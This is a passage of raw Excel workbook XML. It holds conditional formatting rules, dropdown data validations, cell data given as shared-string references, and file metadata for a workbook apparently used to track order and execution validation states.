  <conditionalFormatting sqref="D22:D23 D18:D20 D15:D16 D13 D11 D9">
    <cfRule type="cellIs" dxfId="42" priority="40" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D22:D24 D18:D20 D15:D16 D13 D11 D9">
    <cfRule type="cellIs" dxfId="41" priority="39" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D37 D22:D24 D18:D20 D15:D16 D13 D11 D9">
    <cfRule type="cellIs" dxfId="40" priority="38" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D46">
    <cfRule type="cellIs" dxfId="39" priority="37" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D49 D46">
    <cfRule type="cellIs" dxfId="38" priority="36" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D48:D49 D46">
    <cfRule type="cellIs" dxfId="37" priority="35" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D51 D48:D49 D46">
    <cfRule type="cellIs" dxfId="36" priority="34" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D82 D51 D48:D49 D46">
    <cfRule type="cellIs" dxfId="35" priority="33" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D82:D83 D51 D48:D49 D46">
    <cfRule type="cellIs" dxfId="34" priority="32" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D84:D95 D79:D81 D76:D77 D71:D74 D64:D69 D52 D47 D45 D40:D41 D33:D36 D28:D31 D21 D14 D12">
    <cfRule type="cellIs" dxfId="33" priority="31" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D53:D61">
    <cfRule type="cellIs" dxfId="32" priority="30" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D53:D61">
    <cfRule type="cellIs" dxfId="31" priority="29" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D53:D61">
    <cfRule type="cellIs" dxfId="30" priority="28" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D63">
    <cfRule type="cellIs" dxfId="29" priority="27" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D63">
    <cfRule type="cellIs" dxfId="28" priority="26" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D63">
    <cfRule type="cellIs" dxfId="27" priority="25" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D70 D63">
    <cfRule type="cellIs" dxfId="26" priority="24" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D70 D63">
    <cfRule type="cellIs" dxfId="25" priority="23" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D70 D63">
    <cfRule type="cellIs" dxfId="24" priority="22" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D78 D70 D63">
    <cfRule type="cellIs" dxfId="23" priority="21" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D78 D70 D63">
    <cfRule type="cellIs" dxfId="22" priority="20" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D78 D70 D63">
    <cfRule type="cellIs" dxfId="21" priority="19" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="20" priority="18" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="19" priority="17" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="18" priority="16" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="17" priority="15" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="16" priority="14" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="15" priority="13" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D27 D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="14" priority="12" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D27 D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="13" priority="11" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D27 D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="12" priority="10" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D26:D27 D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="11" priority="9" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D26:D27 D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="10" priority="8" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D26:D27 D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="9" priority="7" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D25:D27 D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="8" priority="6" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D25:D27 D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="7" priority="5" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D25:D27 D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="6" priority="4" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D10 D25:D27 D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="5" priority="3" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D10 D25:D27 D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="4" priority="2" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D10 D25:D27 D43:D44 D78 D70 D63">
    <cfRule type="cellIs" dxfId="3" priority="1" operator="equal">
      <formula>$S$8</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="3">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="D75 D96:D305 D38:D39 D50 D17 D62 D32 D42" xr:uid="{00000000-0002-0000-0000-000001000000}">
      <formula1>$S$5:$S$8</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B2:B304" xr:uid="{00000000-0002-0000-0000-000000000000}">
      <formula1>$Q$4:$Q$21</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="D76:D95 D2:D16 D63:D74 D33:D37 D40:D41 D51:D61 D43:D49 D18:D31" xr:uid="{765F087D-8045-4941-A12C-D113191814EE}">
      <formula1>$S$5:$S$9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6B8A-759D-495D-97B2-C82C6DAE90BB}">
  <sheetPr codeName="Feuil2"/>
  <dimension ref="A1:R76"/>
  <sheetViews>
    <sheetView zoomScale="89" zoomScaleNormal="89" workbookViewId="0">
      <selection activeCell="C16" sqref="C16"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="18.7109375" customWidth="1"/>
    <col min="2" max="2" width="12.5703125" style="6" customWidth="1"/>
    <col min="3" max="3" width="34" customWidth="1"/>
    <col min="7" max="7" width="11.42578125" customWidth="1"/>
    <col min="8" max="8" width="11.85546875" customWidth="1"/>
    <col min="13" max="13" width="53.5703125" customWidth="1"/>
    <col min="14" max="14" width="19.140625" customWidth="1"/>
    <col min="18" max="18" width="12.85546875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:18" s="4" customFormat="1" ht="15.75" x14ac:dyDescent="0.25">
      <c r="A1" s="2" t="s">
        <v>72</v>
      </c>
      <c r="B1" s="5" t="s">
        <v>60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x14ac:dyDescent="0.25">
      <c r="A2" t="s">
        <v>117</v>
      </c>
      <c r="B2" s="6" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="3" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A3" t="s">
        <v>118</v>
      </c>
      <c r="B3" s="6" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="4" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>134</v>
      </c>
      <c r="B4" s="6" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="5" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A5" t="s">
        <v>119</v>
      </c>
      <c r="B5" s="6" t="s">
        <v>63</v>
      </c>
      <c r="N5" t="s">
        <v>66</v>
      </c>
      <c r="R5" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="6" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A6" t="s">
        <v>120</v>
      </c>
      <c r="B6" s="6" t="s">
        <v>63</v>
      </c>
      <c r="N6" t="s">
        <v>67</v>
      </c>
      <c r="O6" t="s">
        <v>43</v>
      </c>
      <c r="P6" t="s">
        <v>63</v>
      </c>
      <c r="R6" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="7" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A7" t="s">
        <v>121</v>
      </c>
      <c r="B7" s="6" t="s">
        <v>63</v>
      </c>
      <c r="C7" t="s">
        <v>135</v>
      </c>
      <c r="N7" t="s">
        <v>81</v>
      </c>
      <c r="P7" t="s">
        <v>133</v>
      </c>
      <c r="R7" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="8" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A8" t="s">
        <v>122</v>
      </c>
      <c r="B8" s="6" t="s">
        <v>63</v>
      </c>
      <c r="N8" t="s">
        <v>68</v>
      </c>
      <c r="P8" t="s">
        <v>132</v>
      </c>
      <c r="R8" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="9" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A9" t="s">
        <v>123</v>
      </c>
      <c r="B9" s="6" t="s">
        <v>132</v>
      </c>
      <c r="N9" t="s">
        <v>69</v>
      </c>
      <c r="R9" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="10" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A10" t="s">
        <v>124</v>
      </c>
      <c r="B10" s="6" t="s">
        <v>63</v>
      </c>
      <c r="N10" t="s">
        <v>70</v>
      </c>
      <c r="O10" t="s">
        <v>47</v>
      </c>
      <c r="R10" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="11" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A11" t="s">
        <v>125</v>
      </c>
      <c r="B11" s="6" t="s">
        <v>133</v>
      </c>
      <c r="N11" t="s">
        <v>71</v>
      </c>
      <c r="R11" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="12" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A12" t="s">
        <v>126</v>
      </c>
      <c r="B12" s="6" t="s">
        <v>132</v>
      </c>
      <c r="C12" t="s">
        <v>136</v>
      </c>
      <c r="N12" t="s">
        <v>72</v>
      </c>
      <c r="R12" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="13" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A13" t="s">
        <v>127</v>
      </c>
      <c r="B13" s="6" t="s">
        <v>133</v>
      </c>
      <c r="C13" t="s">
        <v>137</v>
      </c>
      <c r="N13" t="s">
        <v>73</v>
      </c>
      <c r="R13" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="14" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A14" t="s">
        <v>128</v>
      </c>
      <c r="B14" s="6" t="s">
        <v>133</v>
      </c>
      <c r="C14" t="s">
        <v>139</v>
      </c>
      <c r="N14" t="s">
        <v>74</v>
      </c>
      <c r="R14" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="15" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A15" t="s">
        <v>129</v>
      </c>
      <c r="B15" s="6" t="s">
        <v>132</v>
      </c>
      <c r="C15" t="s">
        <v>138</v>
      </c>
      <c r="N15" t="s">
        <v>75</v>
      </c>
      <c r="R15" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="16" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A16" t="s">
        <v>130</v>
      </c>
      <c r="B16" s="6" t="s">
        <v>132</v>
      </c>
      <c r="N16" t="s">
        <v>76</v>
      </c>
      <c r="R16" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="17" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A17" t="s">
        <v>131</v>
      </c>
      <c r="B17" s="6" t="s">
        <v>133</v>
      </c>
      <c r="C17" t="s">
        <v>140</v>
      </c>
      <c r="N17" t="s">
        <v>77</v>
      </c>
      <c r="R17" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="18" spans="1:18" x14ac:dyDescent="0.25">
      <c r="A18" t="s">
        <v>155</v>
      </c>
      <c r="B18" s="6" t="s">
        <v>63</v>
      </c>
      <c r="N18" t="s">
        <v>79</v>
      </c>
      <c r="R18" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="19" spans="1:18" x14ac:dyDescent="0.25">
      <c r="N19" t="s">
        <v>80</v>
      </c>
      <c r="R19" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="20" spans="1:18" x14ac:dyDescent="0.25">
      <c r="R20" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="33" spans="2:2" x14ac:dyDescent="0.25"/>
    <row r="38" spans="2:2" x14ac:dyDescent="0.25"/>
    <row r="39" spans="2:2" x14ac:dyDescent="0.25"/>
    <row r="40" spans="2:2" x14ac:dyDescent="0.25"/>
    <row r="56" spans="2:8" x14ac:dyDescent="0.25">
      <c r="H56" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="63" spans="2:8" x14ac:dyDescent="0.25"/>
    <row r="64" spans="2:8" x14ac:dyDescent="0.25"/>
    <row r="76" spans="2:2" x14ac:dyDescent="0.25"/>
  </sheetData>
  <autoFilter ref="A1:B81" xr:uid="{873B811C-17E0-44D6-BE49-771EF1C74A88}">
    <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:B80">
      <sortCondition ref="A1"/>
    </sortState>
  </autoFilter>
  <conditionalFormatting sqref="B2:B306">
    <cfRule type="cellIs" dxfId="2" priority="1" operator="equal">
      <formula>$P$8</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="1" priority="2" operator="equal">
      <formula>$P$7</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="0" priority="3" operator="equal">
      <formula>$P$6</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B2:B306" xr:uid="{AF46E0E6-7643-4706-96F8-27AA438766C1}">
      <formula1>$P$6:$P$9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Cmde state validation</vt:lpstr>
      <vt:lpstr>Exec validation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bny</dc:creator>
  <cp:lastModifiedBy>Bertin ABENE</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-04T10:28:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-27T16:15:42Z</dcterms:modified>
</cp:coreProperties>
</file>